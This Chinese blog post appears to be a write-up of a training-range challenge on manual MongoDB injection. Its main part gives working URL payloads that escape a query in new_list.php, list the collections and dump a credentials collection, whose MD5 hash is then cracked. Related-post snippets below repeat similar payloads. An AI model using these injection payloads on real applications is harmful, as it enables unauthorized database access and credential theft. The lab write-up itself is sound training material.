墨者 - SQL手工注入漏洞测试(MongoDB数据库)

最新推荐文章于 2024-04-19 10:48:42 发布
最新推荐文章于 2024-04-19 10:48:42 发布
阅读量2.4k 收藏 17
点赞数 4
分类专栏: 墨者刷题笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39936434/article/details/95319449
版权

Mongodb语法

    在做之前,先了解下相关语法。Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式进行查询的

因为mongodb的数据储存方式:

具体可以参考菜鸟教程:https://www.runoob.com/mongodb/mongodb-query.html

好,对数据结构有个简单了解后,开始进入题目

进入环境,单引号' 测试到注入点

 根据题目给出的代码

 

 构造j简单的链接测试回显:/new_list.php?id=1'}); return ({title:1,content:'2

 

 爆库:  /new_list.php?id=1'}); return ({title:tojson(db),content:'1

 

 

db.getCollectionNames()返回的是数组,需要用tojson转换为字符串。并且mongodb函数区分大小写
爆表: /new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()),content:'1  查询有的集合(集合相当于mysql的表) 

 爆字段:/new_list.php?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1

 db.Authority_confidential是当前用的集合(表),find函数用于查询,0是第一条数据

 

 

MD5在线解密即可 

吃肉唐僧
关注
  • 4
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL手工注入MongoDB数据库
小千安全
01-28 2045
MongoDB语法跟其它数据库有所区别 具体参考:https://www.runoob.com/mongodb/mongodb-query.html 环境 墨者靶场 SQL手工注入漏洞测试(MongoDB数据库) 思路 题目代码给出了列名 如果语句这样写/new_list.php?id=1 order by 2 代码接收db.notice.findOne({‘id’:‘1 order by 2’}); return data; 并没有闭合,注入语句无法生效 想办法闭合语句,查看所有集合 注入语句 都是
墨者学院 - SQL手工注入漏洞测试(MongoDB数据库)
多崎巡礼的博客
08-16 2051
# 查看是否有注入点 http://ip/new_list.php?id=1' # 想办法闭合语句,查看所有集合 # db.getCollectionNames()返回的是数组,需要用tojson转换为字符串。并且mongodb函数区分大小写 http://ip/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()...
墨者学院刷题笔记——SQL手工注入漏洞测试(MongoDB数据库)
永远是少年
07-15 580
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL手工注入漏洞测试(MongoDB数据库)。 一、题目简介 二、漏洞利用
万字总结,建议收藏慢慢看!数据库安全之MongoDB渗透!
2401_83916394的博客
04-19 570
每年转战互联网行业的人很多,说白了也是冲着高薪去的,不管你是即将步入这个行业还是想转行,学习是必不可少的。作为一个Java开发,学习成了日常生活的一部分,不学习你就会被这个行业淘汰,这也是这个行业残酷的现实。如果你对Java感兴趣,想要转行改变自己,那就要趁着机遇行动起来。或许,这份限量版的Java零基础宝典能够对你有所帮助。《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取
墨者靶场-SQL手工注入漏洞测试(MongoDB数据库)
Sa1nZen的博客
08-26 205
墨者靶场-SQL手工注入漏洞测试(MongoDB数据库)
墨者SQL手工注入漏洞测试(MongoDB数据库)题解
zr1213159840的博客
02-12 1833
题目的环境是Nginx+PHP+MongoDB。并且给了如下代码 在题目的考察知识点方面,说到了MD5值。 首先我们来打开链接,发现是用户登录界面(如果不是请稍等一会),然后和往常一样,点击那个通知,发现id的信息 我们读一下代码,在query这个部分,把id插入后,直接返回了查询的data。 用户输入的id的值没有经过任何转义就直接插入数据库中执行,在这个地方我们可以将id的值为 1'}); 这样查询语句就变成了 db.notice.find({'id':'1'})'}) 能看出后面的部分被过滤了
SQL手工注入漏洞测试(MySQL数据库)解题思路小记
Routine_limon的博客
07-05 2978
靶环境:Nginx+PHP+MySQL(题目源自墨者学院) 解题目标: 手工进行SQL注入测试获取管理密码登录。 解题思路: ①寻找sql注入点: 尝试从登陆表单注入: 结果: 后台存在密码账号验证,无法通过此处进行注入。 通过url进行注入: 发现注入点,开始进行sql注入。 ②注入sql 查询表的字段列数: 利用order by 函数对表的字段列数进行尝试,对于列数较多的表,建议使用二...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
mongoaudit::fire:功能强大的MongoDB审核和渗透测试工具:fire:
01-29
mongoaudit是一个CLI工具,用于审核MongoDB服务器,检测不良的安全设置并执行自动渗透测试。 正在安装 克隆此存储库并运行设置: > git clone https://github.com/stampery/mongoaudit.git > cd mongoaudit > python setup.py install > mongoaudit 介绍 众所周知,MongoDB的默认配置设置中有很多漏洞。 这个事实,加上大量懒惰的系统管理员和开发人员,导致了媒体所称的。 mongoaudit不仅可以检测错误的配置,已知的漏洞和错误,还可以为您提供有关如何解决它们的建议,推荐最佳实践以及如何像专家一样教您DevOp! 实际的应用程序如下所示: 是的,这是控制台线界面上的实质性设计。 (由提供支持) 支持的测试 MongoDB侦听与默认端口不同的端口 服务器仅接受来自列入白名单的主机/网络的连接 MongoDB HTTP状态界面在端口28017上不可访问 MongoDB没有公开其版本号 MongoDB版本高于2.4 启用TLS / SSL加密 启用身份验证 启用了
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
MongoDBsql 语句对应关系
xiaozhu0301的博客
01-27 376
看了些资料,对应只需要知道怎么查询和使用mongodb的我来说,这些足够啦。 左边是mongodb查询语句,右边是sql语句。对照着用,挺方便。 db.users.find() select*fromusers db.users.find({"age":27}) select*fromuserswhereage=27 db.users.find({"username":"joe","age":27}) select*fromuserswhere"usern...
0x07.SQL手工注入漏洞测试(MySQL数据库)
qq_31679787的博客
09-19 165
点击通知栏,出现注入页面; 使用sqlmap确认有注入点; 爆数据库; 爆表名; 爆列名; 爆数据; md5解密; 得到key;
MongoDB数据库注入-墨者学院(SQL手工注入漏洞测试(MongoDB数据库))
T1ngSh0w的博客
09-05 1453
MongoDB数据库注入-墨者学院-SQL手工注入漏洞测试(MongoDB数据库)详细讲解
MongoDB 任意代码执行漏洞(CVE-2013-4142)
weixin_30877181的博客
07-26 501
漏洞版本: MongoDB 2.4.0-2.4.4 漏洞描述: CVE ID:CVE-2013-4142 MongoDB是一个高性能,开源,无模式的文档型数据库,是当前NoSql数据库中比较热门的一种 MongoDB "mongo::mongoFind()"函数(src/mongo/scripting/v8_db.cpp)在解析规则表达式时存在一个安全漏洞,允许对Mo...
MongoDB注入
m0_48520508的博客
09-08 1080
#一、简介 MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。 MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。 二、注入 简单的语句执行,注入 这里我们有一个mongodb数据库数据库为test 执行了语句: db.test.find({username:’test’,password:’test’}); 如果此时传入的url如下: http://127.0.0
mongodb漏洞批量扫描工具
weixin_34221775的博客
07-19 449
更多安全相关的内容:http://www.codefrom.com/u/%E8%A5%BF%E4%BA%8C%E6%97%97%E5%89%91%E5%AE%A... 环境依赖 easy_install pymongo 安装方法 git clone https://github.com/insightglacier/V...
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值